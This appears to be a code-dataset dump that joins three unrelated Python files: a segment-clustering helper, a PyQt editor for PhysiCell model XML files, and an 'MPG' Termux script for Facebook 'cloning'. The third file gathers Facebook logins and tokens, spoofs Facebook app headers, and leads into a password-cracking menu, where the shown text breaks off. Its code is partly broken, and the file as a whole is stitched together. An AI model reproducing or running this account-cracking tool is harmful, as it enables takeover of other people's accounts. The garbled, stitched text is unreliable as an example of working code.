similarity="cosine",
merge=True,
linkage=np.min,
cache: Optional[dict] = {},
):
"""A helper to compute similarity between two Segment clusters
using element-wise-similarity/or merged
:param other: The segment cluster with which we want compute the similarity
:param merge: Merge the cluster to one segment before
:param linkage: The type of aggregation of individual similarity.
:param cache:
"""
if merge:
# Merge/interpolate/average the segment cluster into one segment before applying the similarity
return self.compute().sim(other.compute(), similarity=similarity)
else:
# TODO: (optionally) use the linkage function to compute similarity between the two cluster instead of the merge/extended segment
pass
class SimContainer:
"""A helper class that contains similar items for fast retrieval"""
def __init__(self, item):
self.__item = item
self.__queue = PriorityQueue()
self.__best = None
self._similar = set() # keeps track of similar items
self._removed = set() # keeps track of the removed keys/items
def __repr__(self):
repr_str = ""
if self.__best:
repr_str += str(self.__best)
repr_str += str(self.__queue.queue)
return repr_str
def put(self, similar, similarity):
"""Put a similar item in the container
:param similar: a similar item (hashable) or a key
:param similarity: a non zero similarity to the container self._item
"""
if similar in self._removed:
self._removed.remove(similar)
self._similar.add(similar)
self.__queue.put((1 / similarity, similar, similarity))
if self.__best:
self.__queue.put(
self.__best
) # put back the best item to compete with the new one
self.__best = (
self.__queue.get()
) # caching the best similar item (according to similarity)
while (
self.__best[1] in self._removed
): # the best is not valid anymore as it was removed
self.__best = self.__queue.get()
def remove(self, key):
"""A helper to remove an item from the container (only by key)"""
if key in self._similar:
# the item exist -> update the queue
self._similar.remove(key)
self._removed.add(key)
while self.__best and self.__best[1] in self._removed:
# update the best
if not self.__queue.empty():
self.__best = self.__queue.get()
else:
self.__best = None
def best(self):
"""return the best similarity in this container"""
return self.__best
@property
def queue(self):
"""return the queue."""
return self.__queue.queue
@property
def similar(self):
similar_items = []
if self.__best is None:
return []
else:
similar_items.append(
self.__best[1]
) # update the similar items with the best one (cached)
if len(self.__queue.queue):
similar_items.extend(
[item[1] for item in self.__queue.queue if item[1] not in self._removed]
)
return similar_items
def agglomerate(
data: List[Segment], threshold: float, similarity="cosine"
) -> Tuple[dict, dict]:
"""Agglomerate data item given
using agglomerative-clustering (grouping the closest cluster first)
(todo: simultaneous grouping before updating the)
:param threshold: similarity threshold above which 2 items
are considered similar and could be merged
:param similarity: The similarity measure between 2 segments
:return: Tuple/Couple of clusters' dictionary where the keys are the cluster identified by the index of the item in the original data
the `data` parameter and the values are the similar item non yet merged/will not because the similarity with these items is below the
`threshold` parameter. And the store of computed merged segment of the cluster and the intermediate merges that lead to the final
returned clusters.
"""
logger = logging.getLogger(__name__)
def get_merge_candidates(sim_dict):
"""a helper to get candidates to merge"""
pq_ = PriorityQueue()
for key, value in sim_dict.items():
best = value.best() # get best item from the SimContainer (value)
if best:
pq_.put((best, key))
if pq_.empty():
return None, None
else:
return pq_.get()
# Build the similarity between
data_dict = {} # a dictionary
for index, item in enumerate(data):
data_dict[(index,)] = item
# Sorted segment by length (from the longest to the shortest segment)
# to prioritize the segments to be merged (short or long ones)
segments = sorted(
[(key, segment) for key, segment in data_dict.items()],
key=lambda x: x[1].norm,
reverse=True,
)
# populate similarities (Matrix as a dictionary)
similarities = {}
for i in range(len(segments)):
# similarities.
key_i, segment_i = segments[i]
similarities[key_i] = SimContainer(segment_i)
for j in range(1, len(segments)):
key_j, segment_j = segments[j]
similarities[key_i].put(
key_j, segment_i.sim(segment_j, similarity=similarity)
)
# Search for the best items to agglomerate/merge
best, orig = get_merge_candidates(similarities)
while best and (best[2] > threshold):
to_merge = {orig, best[1]}
logger.debug(f" Merging (clusters) -> {to_merge}")
merged = SegmentCluster(orig + best[1], data) # Merged cluster
merged_segment = merged.compute(cache=data_dict, update=True)
# Similar candidates to the cluster to update their similarity entries (previous similar to the (orig and best))
to_update = set(
chain(
*[
container.similar
for container in filter(
lambda item: item is not None,
[similarities.get(key, None) for key in to_merge],
)
]
)
)
# remove the merged part
for key in to_merge:
if key in similarities:
del similarities[key]
# remove the merged item from the other similarity container
for key, sim_container in similarities.items():
sim_container.remove(orig)
sim_container.remove(best[1])
to_update.difference_update(
{orig, best[1]}
) # clean to_update from the already merged items
to_update.update(similarities.keys())
similarities[merged._id] = SimContainer(merged_segment)
for key in to_update:
similarities[merged._id].put(
key, merged_segment.sim(data_dict[key], similarity=similarity)
)
# get the next best candidates to agglomerate
best, orig = get_merge_candidates(similarities)
return similarities, data_dict
| StarcoderdataPython |
3540433 | """
Authors:
<NAME> (<EMAIL>)
<NAME>, <NAME>, <NAME>, <NAME>
Dr. <NAME> (<EMAIL>)
--- Versions ---
0.1 - initial version
"""
# https://doc.qt.io/qtforpython/gettingstarted.html
import os
import sys
import getopt
import shutil
from pathlib import Path
import xml.etree.ElementTree as ET # https://docs.python.org/2/library/xml.etree.elementtree.html
from xml.dom import minidom
from PyQt5 import QtCore, QtGui
from PyQt5.QtWidgets import *
from config_tab import Config
from cell_def_tab import CellDef
from cell_custom_data_tab import CellCustomData
from microenv_tab import SubstrateDef
from user_params_tab import UserParams
# from sbml_tab import SBMLParams
from vis_tab import Vis
def SingleBrowse(self):
# if len(self.csv) < 2:
filePath = QFileDialog.getOpenFileName(self,'',".",'*.xml')
# if filePath != "" and not filePath in self.csv:
# self.csv.append(filePath)
# print(self.csv)
#class PhysiCellXMLCreator(QTabWidget):
class PhysiCellXMLCreator(QWidget):
# def __init__(self, parent = None):
def __init__(self, show_vis_flag, parent = None):
super(PhysiCellXMLCreator, self).__init__(parent)
self.title_prefix = "PhysiCell Model Creator: "
self.setWindowTitle(self.title_prefix)
# Menus
vlayout = QVBoxLayout(self)
# vlayout.setContentsMargins(5, 35, 5, 5)
menuWidget = QWidget(self.menu())
vlayout.addWidget(menuWidget)
# self.setWindowIcon(self.style().standardIcon(getattr(QStyle, 'SP_DialogNoButton')))
# self.setWindowIcon(QtGui.QIcon('physicell_logo_25pct.png'))
# self.grid = QGridLayout()
# lay.addLayout(self.grid)
self.setLayout(vlayout)
# self.setMinimumSize(400, 790) # width, height (height >= Cell Types|Death params)
# self.setMinimumSize(400, 500) # width, height (height >= Cell Types|Death params)
# self.setMinimumSize(800, 620) # width, height (height >= Cell Types|Death params)
# self.setMinimumSize(800, 660) # width, height (height >= Cell Types|Death params)
# self.setMinimumSize(800, 800) # width, height (height >= Cell Types|Death params)
self.setMinimumSize(700, 770) # width, height (height >= Cell Types|Death params)
# self.setMinimumSize(600, 600) # width, height (height >= Cell Types|Death params)
# self.resize(400, 790) # width, height (height >= Cell Types|Death params)
# self.menubar = QtWidgets.QMenuBar(self)
# self.file_menu = QtWidgets.QMenu('File')
# self.file_menu.insertAction("Open")
# self.menubar.addMenu(self.file_menu)
# GUI tabs
# By default, let's startup the app with a default of template2D (a copy)
# self.new_model_cb() # default on startup
# read_file = "../data/subcellular_flat.xml"
# read_file = "../data/cancer_biorobots_flat.xml"
# read_file = "../data/pred_prey_flat.xml"
model_name = "pred_prey_flat"
model_name = "biorobots_flat"
model_name = "cancer_biorobots_flat"
model_name = "test1"
model_name = "test-gui"
model_name = "covid19_v5_flat"
model_name = "template"
# model_name = "randy_test" #rwh
# read_file = "data/" + model_name + ".xml"
# then what??
# binDirectory = os.path.realpath(os.path.abspath(__file__))
binDirectory = os.path.dirname(os.path.abspath(__file__))
dataDirectory = os.path.join(binDirectory,'..','data')
# read_file = model_name + ".xml"
read_file = os.path.join(dataDirectory, model_name + ".xml")
# self.setWindowTitle(self.title_prefix + model_name)
# NOTE! We create a *copy* of the .xml sample model and will save to it.
copy_file = "copy_" + model_name + ".xml"
shutil.copy(read_file, copy_file)
self.setWindowTitle(self.title_prefix + copy_file)
# self.add_new_model(copy_file, True)
# self.config_file = "config_samples/" + name + ".xml"
self.config_file = copy_file # to Save
# self.config_file = read_file # nanoHUB... to Save
self.tree = ET.parse(self.config_file)
# tree = ET.parse(read_file)
# self.tree = ET.parse(read_file)
self.xml_root = self.tree.getroot()
# self.template_cb()
self.num_models = 0
self.model = {} # key: name, value:[read-only, tree]
self.config_tab = Config()
self.config_tab.xml_root = self.xml_root
self.config_tab.fill_gui()
self.microenv_tab = SubstrateDef()
self.microenv_tab.xml_root = self.xml_root
substrate_name = self.microenv_tab.first_substrate_name()
print("gui4xml: substrate_name=",substrate_name)
self.microenv_tab.populate_tree() # rwh: both fill_gui and populate_tree??
# self.tab2.tree.setCurrentItem(QTreeWidgetItem,0) # item
self.celldef_tab = CellDef()
self.celldef_tab.xml_root = self.xml_root
cd_name = self.celldef_tab.first_cell_def_name()
print("gui4xml: cd_name=",cd_name)
self.celldef_tab.populate_tree()
self.celldef_tab.fill_substrates_comboboxes()
self.microenv_tab.celldef_tab = self.celldef_tab
self.cell_customdata_tab = CellCustomData()
self.cell_customdata_tab.xml_root = self.xml_root
self.cell_customdata_tab.celldef_tab = self.celldef_tab
self.cell_customdata_tab.fill_gui(self.celldef_tab)
self.celldef_tab.fill_custom_data_tab()
self.user_params_tab = UserParams()
self.user_params_tab.xml_root = self.xml_root
self.user_params_tab.fill_gui()
# self.sbml_tab = SBMLParams()
# self.sbml_tab.xml_root = self.xml_root
# self.sbml_tab.fill_gui()
#------------------
tabWidget = QTabWidget()
tabWidget.addTab(self.config_tab,"Config Basics")
tabWidget.addTab(self.microenv_tab,"Microenvironment")
tabWidget.addTab(self.celldef_tab,"Cell Types")
tabWidget.addTab(self.cell_customdata_tab,"Cell Custom Data")
tabWidget.addTab(self.user_params_tab,"User Params")
if show_vis_flag:
self.vis_tab = Vis()
# self.vis_tab.xml_root = self.xml_root
tabWidget.addTab(self.vis_tab,"Plot")
vlayout.addWidget(tabWidget)
# self.addTab(self.sbml_tab,"SBML")
# tabWidget.setCurrentIndex(1) # rwh/debug: select Microenv
# tabWidget.setCurrentIndex(2) # rwh/debug: select Cell Types
if show_vis_flag:
tabWidget.setCurrentIndex(5) # Vis (default)
else:
tabWidget.setCurrentIndex(0) # Config (default)
def menu(self):
menubar = QMenuBar(self)
menubar.setNativeMenuBar(False)
#--------------
file_menu = menubar.addMenu('&File')
# open_act = QtGui.QAction('Open', self, checkable=True)
# open_act = QtGui.QAction('Open', self)
# open_act.triggered.connect(self.open_as_cb)
file_menu.addAction("New (template)", self.new_model_cb, QtGui.QKeySequence('Ctrl+n'))
file_menu.addAction("Open", self.open_as_cb, QtGui.QKeySequence('Ctrl+o'))
file_menu.addAction("Save", self.save_cb, QtGui.QKeySequence('Ctrl+s'))
# file_menu.addAction("Save as", self.save_as_cb)
file_menu.addAction("Save as mymodel.xml", self.save_as_cb)
# recent_act = QtGui.QAction('Recent', self)
# save_act = QtGui.QAction('Save', self)
# save_act.triggered.connect(self.save_cb)
# saveas_act = QtGui.QAction('Save As my.xml', self)
# file_menu.setStatusTip('enable/disable Dark mode')
# new_model_act = QtGui.QAction('', self)
# file_menu.addAction(new_model_act)
# new_model_act.triggered.connect(self.new_model_cb)
#--------------
samples_menu = file_menu.addMenu("Samples (copy of)")
# biorobots_act = QtGui.QAction('biorobots', self)
biorobots_act = QAction('biorobots', self)
samples_menu.addAction(biorobots_act)
biorobots_act.triggered.connect(self.biorobots_cb)
cancer_biorobots_act = QAction('cancer biorobots', self)
samples_menu.addAction(cancer_biorobots_act)
cancer_biorobots_act.triggered.connect(self.cancer_biorobots_cb)
hetero_act = QAction('heterogeneity', self)
samples_menu.addAction(hetero_act)
hetero_act.triggered.connect(self.hetero_cb)
pred_prey_act = QAction('predator-prey-farmer', self)
samples_menu.addAction(pred_prey_act)
pred_prey_act.triggered.connect(self.pred_prey_cb)
virus_mac_act = QAction('virus-macrophage', self)
samples_menu.addAction(virus_mac_act)
virus_mac_act.triggered.connect(self.virus_mac_cb)
worm_act = QAction('worm', self)
samples_menu.addAction(worm_act)
worm_act.triggered.connect(self.worm_cb)
cancer_immune_act = QAction('cancer immune (3D)', self)
samples_menu.addAction(cancer_immune_act)
cancer_immune_act.triggered.connect(self.cancer_immune_cb)
template_act = QAction('template', self)
samples_menu.addAction(template_act)
template_act.triggered.connect(self.template_cb)
subcell_act = QAction('subcellular', self)
samples_menu.addAction(subcell_act)
subcell_act.triggered.connect(self.subcell_cb)
covid19_act = QAction('covid19_v5', self)
samples_menu.addAction(covid19_act)
covid19_act.triggered.connect(self.covid19_cb)
test_gui_act = QAction('test-gui', self)
samples_menu.addAction(test_gui_act)
test_gui_act.triggered.connect(self.test_gui_cb)
#--------------
# file_menu.addAction(open_act)
# file_menu.addAction(recent_act)
# file_menu.addAction(save_act)
# file_menu.addAction(save_act, self.save_act, QtGui.QKeySequence("Ctrl+s"))
# file_menu.addAction(saveas_act)
#--------------
# self.models_menu = menubar.addMenu('&Models')
# models_menu_act = QAction('-----', self)
# self.models_menu.addAction(models_menu_act)
# models_menu_act.triggered.connect(self.select_current_model_cb)
# # self.models_menu.addAction('Load sample', self.select_current_model_cb)
#--------------
tools_menu = menubar.addMenu('&Tools')
validate_act = QAction('Validate', self)
tools_menu.addAction(validate_act)
validate_act.triggered.connect(self.validate_cb)
menubar.adjustSize() # Argh. Otherwise, only 1st menu appears, with ">>" to others!
#-----------------------------------------------------------------
def add_new_model(self, name, read_only):
# does it already exist? If so, return
if name in self.model.keys():
return
self.model[name] = read_only
self.num_models += 1
print("add_new_model: self.model (dict)= ",self.model)
# models_menu_act = QAction(name, self)
# self.models_menu.addAction(models_menu_act)
# models_menu_act.triggered.connect(self.select_current_model_cb)
print("add_new_model: title suffix= ",name)
self.setWindowTitle(self.title_prefix + name)
# Probably not used unless we later implement it
# def select_current_model_cb(self):
# # models_menu_act = QtGui.QAction(name, self)
# # self.models_menu.addAction(models_menu_act)
# model_act = self.models_menu.menuAction()
# print('select_current_model_cb: ',model_act)
# action = self.sender()
# model_name = action.text()
# print('select_current_model_cb: title suffix name= ',model_name)
# self.setWindowTitle(self.title_prefix + model_name)
def reset_xml_root(self):
self.celldef_tab.clear_custom_data_tab()
self.celldef_tab.param_d.clear() # seems unnecessary as being done in populate_tree. argh.
self.celldef_tab.current_cell_def = None
# self.microenv_tab.param_d.clear()
self.xml_root = self.tree.getroot()
self.config_tab.xml_root = self.xml_root
self.microenv_tab.xml_root = self.xml_root
self.celldef_tab.xml_root = self.xml_root
self.cell_customdata_tab.xml_root = self.xml_root
self.user_params_tab.xml_root = self.xml_root
self.config_tab.fill_gui()
self.microenv_tab.clear_gui()
self.microenv_tab.populate_tree()
# self.microenv_tab.fill_gui(None)
# self.microenv_tab.fill_gui()
# Do this before the celldef_tab
self.cell_customdata_tab.clear_gui(self.celldef_tab)
self.cell_customdata_tab.fill_gui(self.celldef_tab)
# self.celldef_tab.clear_gui()
self.celldef_tab.clear_custom_data_params()
self.celldef_tab.populate_tree()
# self.celldef_tab.fill_gui(None)
# self.celldef_tab.customize_cycle_choices() #rwh/todo: needed?
self.celldef_tab.fill_substrates_comboboxes()
self.microenv_tab.celldef_tab = self.celldef_tab
# self.cell_customdata_tab.clear_gui(self.celldef_tab)
# self.cell_customdata_tab.fill_gui(self.celldef_tab)
self.user_params_tab.clear_gui()
self.user_params_tab.fill_gui()
def show_sample_model(self):
print("show_sample_model: self.config_file = ", self.config_file)
# self.config_file = "config_samples/biorobots.xml"
self.tree = ET.parse(self.config_file)
# self.xml_root = self.tree.getroot()
self.reset_xml_root()
self.setWindowTitle(self.title_prefix + self.config_file)
# self.config_tab.fill_gui(self.xml_root) #
# self.microenv_tab.fill_gui(self.xml_root) # microenv
# self.celldef_tab.fill_gui("foobar") # cell defs
# self.celldef_tab.fill_motility_substrates()
def open_as_cb(self):
# filePath = QFileDialog.getOpenFileName(self,'',".",'*.xml')
filePath = QFileDialog.getOpenFileName(self,'',".")
print("\n\nopen_as_cb(): filePath=",filePath)
full_path_model_name = filePath[0]
# sample_file = Path("data", name + ".xml")
# copy_file = "copy_" + name + ".xml"
copy_file = "mymodel.xml"
# shutil.copy(sample_file, copy_file)
shutil.copy(full_path_model_name, copy_file)
self.add_new_model(copy_file, True)
# self.config_file = "config_samples/" + name + ".xml"
self.config_file = copy_file
self.show_sample_model()
def indent(elem, level=0):
i = "\n" + level*" "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
indent(elem, level+1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
def prettify(self, elem):
"""Return a pretty-printed XML string for the Element.
"""
rough_string = ET.tostring(elem, 'utf-8')
reparsed = minidom.parseString(rough_string)
return reparsed.toprettyxml(indent="", newl="") # newl="\n"
def save_cb(self):
# self.config_file = copy_file
self.config_tab.fill_xml()
# self.microenv_tab.fill_xml()
# self.celldef_tab.fill_xml()
# self.user_params_tab.fill_xml()
# filePath = QFileDialog.getOpenFileName(self,'',".",'*.xml')
# print("gui4xml: save_cb: writing to: ",self.config_file)
out_file = self.config_file
# out_file = "mymodel.xml"
print("gui4xml: save_cb: writing to: ",out_file)
# self.tree.write(self.config_file)
# root = ET.fromstring("<fruits><fruit>banana</fruit><fruit>apple</fruit></fruits>""")
# tree = ET.ElementTree(root)
# ET.indent(self.tree) # ugh, only in 3.9
# root = ET.tostring(self.tree)
# self.indent(self.tree)
# self.indent(root)
# rwh: ARGH, doesn't work
# root = self.tree.getroot()
# out_str = self.prettify(root)
# print(out_str)
self.tree.write(out_file)
# rwh NOTE: after saving the .xml, do we need to read it back in to reflect changes.
# self.tree = ET.parse(self.config_file)
# self.xml_root = self.tree.getroot()
# self.reset_xml_root()
def validate_cb(self):
msgBox = QMessageBox()
msgBox.setIcon(QMessageBox.Information)
msgBox.setText("Validation not yet implemented.")
msgBox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)
returnValue = msgBox.exec()
if returnValue == QMessageBox.Ok:
print('OK clicked')
def save_as_cb(self):
# save_as_file = QFileDialog.getSaveFileName(self,'',".")
# if save_as_file:
# print(save_as_file)
# print(" save_as_file: ",save_as_file) # writing to: ('/Users/heiland/git/PhysiCell-model-builder/rwh.xml', 'All Files (*)')
self.config_tab.fill_xml()
self.microenv_tab.fill_xml()
self.celldef_tab.fill_xml()
self.user_params_tab.fill_xml()
save_as_file = "mymodel.xml"
print("gui4xml: save_as_cb: writing to: ",save_as_file) # writing to: ('/Users/heiland/git/PhysiCell-model-builder/rwh.xml', 'All Files (*)')
self.tree.write(save_as_file)
def new_model_cb(self):
# name = "copy_template"
# self.add_new_model(name, False)
# self.config_file = "config_samples/template.xml"
# self.show_sample_model()
name = "template"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
# self.config_file = "config_samples/" + name + ".xml"
self.config_file = copy_file
self.show_sample_model()
def biorobots_cb(self):
print("\n\n\n================ copy/load sample ======================================")
name = "biorobots_flat"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
# self.config_file = "config_samples/" + name + ".xml"
self.config_file = copy_file
self.show_sample_model()
# self.tree = ET.parse(self.config_file)
# self.xml_root = self.tree.getroot()
# self.celldef_tab.xml_root = self.xml_root
# self.config_tab.fill_gui(self.xml_root)
# self.microenv_tab.fill_gui(self.xml_root)
# self.celldef_tab.fill_gui(self.xml_root)
def cancer_biorobots_cb(self):
name = "cancer_biorobots_flat"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
def hetero_cb(self):
name = "heterogeneity"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
def pred_prey_cb(self):
name = "pred_prey_flat"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
def virus_mac_cb(self):
name = "virus_macrophage_flat"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
def worm_cb(self):
name = "worm"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
def cancer_immune_cb(self):
name = "cancer_immune3D_flat"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
def template_cb(self):
name = "template"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
# def template3D_cb(self):
# name = "template3D_flat"
# self.add_new_model(name, True)
# self.config_file = "config_samples/" + name + ".xml"
# self.show_sample_model()
def subcell_cb(self):
name = "subcellular_flat"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
def covid19_cb(self):
name = "covid19_v5_flat"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
def test_gui_cb(self):
name = "test-gui"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
# def main():
# app = QApplication(sys.argv)
# ex = PhysiCellXMLCreator()
# # ex.setGeometry(100,100, 800,600)
# ex.show()
# sys.exit(app.exec_())
def main():
inputfile = ''
show_vis_tab = False
try:
# opts, args = getopt.getopt(argv,"hi:o:",["ifile=","ofile="])
opts, args = getopt.getopt(sys.argv[1:],"hv:",["vis"])
except getopt.GetoptError:
# print 'test.py -i <inputfile> -o <outputfile>'
print('getopt exception')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
# print 'test.py -i <inputfile> -o <outputfile>'
print('bin/gui4xml.py [--vis]')
sys.exit(1)
# elif opt in ("-i", "--ifile"):
elif opt in ("--vis"):
show_vis_tab = True
# print 'Input file is "', inputfile
# print("show_vis_tab = ",show_vis_tab)
# sys.exit()
app = QApplication(sys.argv)
ex = PhysiCellXMLCreator(show_vis_tab)
# ex.setGeometry(100,100, 800,600)
ex.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main() | StarcoderdataPython |
6598784 | <reponame>fiazkhan420/khan
#!/usr/bin/python2
# coding=utf-8
import os
import sys
import time
import datetime
import re
import threading
import json
import random
import requests
import hashlib
import cookielib
import uuid
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
__author__ = 'Mr-Robot'
__copyright = 'All rights reserved . Copyright Mr-Robot'
os.system('termux-setup-storage')
try:
os.mkdir('/sdcard/ids')
except OSError:
pass
bd = random.randint(2e+07, 3e+07)
sim = random.randint(20000, 40000)
header = {
'x-fb-connection-bandwidth': repr(bd),
'x-fb-sim-hni': repr(sim),
'x-fb-net-hni': repr(sim),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]',
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
os.system('git pull')
os.system('clear')
#### colours ####
B='\033[1;94m'
R='\033[1;91m'
G='\033[1;92m'
W='\033[1;97m'
S='\033[1;96m'
P='\033[1;95m'
Y='\033[1;93m'
#Dev:<NAME>
#### LOGO ####
logo = """
\033[1;97m ****************"*****************
\033[1;96m *███╗░░░███╗██████╗░░██████╗░ *F*
\033[1;95m *████╗░████║██╔══██╗██╔════╝░ *A*
\033[1;94m *██╔████╔██║██████╔╝██║░░██╗░ *M*
\033[1;93m *██║╚██╔╝██║██╔═══╝░██║░░╚██╗ *I*
\033[1;92m *██║░╚═╝░██║██║░░░░░╚██████╔╝ *L*
\033[1;91m *╚═╝░░░░░╚═╝╚═╝░░░░░░╚═════╝░ *Y*
\033[1;92m 🄱🅁🄰🄽🄳
\033[1;97m **********************************
\033[1;93m SCRIPT MAKER : XTY<NAME>
\033[1;96m GANG OWNER : <NAME>
\033[1;95m NOTE : ONLY FOR GANG
\033[1;94m BE ORIGINAL LETS THE WORLD COPY U
\033[1;97m *********************************
"""
def reg():
os.system('clear')
print logo
print ''
print '\033[1;31;1mTake The Free Approval For Login'
print ''
time.sleep(1)
try:
to = open('/sdcard/.hst.txt', 'r').read()
except (KeyError, IOError):
reg2()
r = requests.get('https://raw.githubusercontent.com/pathani404/MPG/main/mpg.txt').text
if to in r:
os.system('cd ..... && npm install')
os.system('fuser -k 5000/tcp &')
os.system('#')
os.system('cd ..... && node index.js &')
time.sleep(2)
ip()
else:
os.system('clear')
print logo
print '\tApproved Failed'
print ' \033[1;92mYour Id Is Not Approved Already '
print ' \033[1;92mCopy the id and send to admin'
print ' \033[1;92mYour id: ' + to
raw_input('\033[1;93m Press enter to send id')
os.system('xdg-open https://wa.me/+923414547149')
reg()
def reg2():
os.system('clear')
print logo
print '\tApproval not detected'
print ' \033[1;92mCopy kr k send kro Whatsapp py to continue'
id = uuid.uuid4().hex[:50]
print ' Your id: ' + id
print ''
raw_input(' Press enter to go to Whatsapp ')
os.system('xdg-open https://wa.me/+923414547149')
sav = open('/sdcard/.hst.txt', 'w')
sav.write(id)
sav.close()
raw_input('\033[1;92m Press enter to check Approval ')
reg()
def ip():
os.system('clear')
print logo
print '\tCollecting device info'
try:
ipinfo = requests.get('http://ip-api.com/json/')
z = json.loads(ipinfo.text)
ips = z['query']
country = z['country']
regi = z['regionName']
network = z['isp']
except:
pass
print '\033[1;92m Your ip: ' + ips
time.sleep(2)
print '\033[1;92m Your country: ' + country
time.sleep(2)
print '\033[1;92m Your region: ' + regi
time.sleep(2)
print ' \033[1;92mYour network: ' + network
time.sleep(2)
print ' Loading ...'
time.sleep(2)
log_menu()
def log_menu():
try:
t_check = open('access_token.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print '\033[1;90m *********Login menu*********\033[1;94m'
print 47 * '-'
print '\033[1;92m[1] Login with FaceBook'
print '\033[1;92m[2] Login with token'
print '\033[1;92m[3] MPG Brand'
print ''
log_menu_s()
def log_menu_s():
s = raw_input(' \033[1;97m╰─MPG➤ ')
if s == '1':
log_fb()
elif s == '2':
log_token()
elif s == '3':
os.system('xdg-open https://facebook.com/quyyam.jafar/')
else:
print ''
print '\\ Select valid option '
print ''
log_menu_s()
def log_fb():
os.system('clear')
print logo
print '\033[1;31;1mLogin with id/pass'
print 47 * '-'
lid = raw_input('\033[1;92m Id/mail/no: ')
pwds = raw_input(' \033[1;93mPassword: ')
try:
data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + <PASSWORD>).text
q = json.loads(data)
if 'loc' in q:
ts = open('access_token.txt', 'w')
ts.write(q['loc'])
ts.close()
menu()
elif 'www.facebook.com' in q['error']:
print ' User must verify account before login'
raw_input('\033[1;92m Press enter to try again ')
log_fb()
else:
print ' Id/Pass may be wrong'
raw_input(' \033[1;92mPress enter to try again ')
log_fb()
except:
print ''
print 'Exiting tool'
os.system('exit')
def log_token():
os.system('clear')
print logo
print '\033[1;93mLogin with token\033[1;91m'
print 47 * '-'
tok = raw_input(' \033[1;92mPaste token here: \033[1;91m')
print 47 * '-'
t_s = open('access_token.txt', 'w')
t_s.write(tok)
t_s.close()
menu()
def menu():
os.system('clear')
try:
token = open('access_token.txt', 'r').read()
except (KeyError, IOError):
print ''
print logo
print '\033[1;31;1mLogin FB id to continue'
time.sleep(1)
log_menu()
try:
r = requests.get('https://graph.facebook.com/me?access_token=' + token)
q = json.loads(r.text)
z = q['name']
except (KeyError, IOError):
print logo
print ''
print '\t Account Cheekpoint\x1b[0;97m'
print ''
os.system('rm -rf access_token.txt')
time.sleep(1)
log_menu()
except requests.exceptions.ConnectionError:
print logo
print ''
print '\t Turn on mobile data/wifi\x1b[0;97m'
print ''
raw_input(' \033[1;92mPress enter after turning on mobile data/wifi ')
menu()
os.system('clear')
print logo
tok = open('/sdcard/.hst.txt', 'r').read()
print ' \033[1;92mLogged in user: \033[1;94m' + z
print 47 * '-'
print ' \033[1;90m Active token: \033[1;94m' + tok
print ' ------------------------------------------ '
print '\033[1;92m[1] Start Cloning'
print '\033[1;92m[2] Follow MPG OWNER'
print '\033[1;92m[3] View token'
print '\033[1;92m[4] Logout'
print '\033[1;92m[5] Delete trash files'
menu_s()
def menu_s():
ms = raw_input('\033[1;97m╰─MPG➤ ')
if ms == '1':
auto_crack()
elif ms == '2':
os.system('xdg-open https://facebook.com/quyyam.jafar/')
elif ms == '3':
v_tok()
elif ms == '4':
lout()
elif ms == '5':
rtrash()
else:
print ''
print '\tSelect valid option'
print ''
menu_s()
def crack():
global toket
try:
toket=open('login.txt','r').read()
except (KeyError, IOError):
os.system('clear')
print logo
print '\t File Not Found \x1b[0;97m'
print ''
time.sleep(1)
log_menu()
os.system('clear')
print logo
print '\033[1;90m~~~~ Choice pass cracking ~~~~\033[1;94m'
print 47 * '-'
print '\033[1;92m[1] Public id cloning'
print '\033[1;92m[2] Followers cloning'
